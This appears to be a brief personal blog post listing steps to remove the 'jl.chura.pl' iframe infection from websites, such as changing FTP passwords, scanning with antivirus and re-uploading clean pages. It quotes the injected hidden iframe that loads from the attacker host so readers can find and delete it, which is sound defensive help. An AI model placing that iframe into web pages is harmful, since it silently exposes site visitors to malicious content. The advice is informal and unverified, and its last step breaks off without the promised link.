I wrote a post about “Iframe Virus jl.chura.pl Removal“. Everyday, lots of users come to that post. I want write more about jl.chura.pl virus. I write a todo list.
jl.chura.pl Virus Remove todo list:
- Change all FTP passwords which is saved in your FTP program (ex. CuteFtp)
- Close your web sites if they are virused.
- Remove this code: “<iframe src=”http://jL.chura.pl/rc/” style=”display:none”></iframe>” with using Dreamweaver or any program which is access all pages in a directory.
- Download “Avast Home Edition“, free and infected this virus.
- Setup Avast Home Edition
- Restart your PC and open in safe mode
- Scan all of your computer.
- Upload clean pages to your web site
- Reopen your web site
- If google says your web site is have badwares, read;
PS: I am not guarenteed virus removal, this is my todo list. I did and now it is all cleaned.